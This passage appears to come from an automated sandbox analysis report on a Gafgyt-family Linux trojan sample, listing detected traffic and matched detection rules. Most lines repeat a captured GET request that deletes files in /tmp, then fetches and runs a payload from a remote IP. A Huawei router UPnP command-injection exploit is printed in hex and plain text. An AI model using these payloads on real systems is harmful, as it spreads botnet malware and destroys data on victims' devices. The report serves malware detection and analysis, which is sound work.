          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficDNS traffic detected: DNS query: scamanje.stresserit.pro
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: x86_64.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: x86_64.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
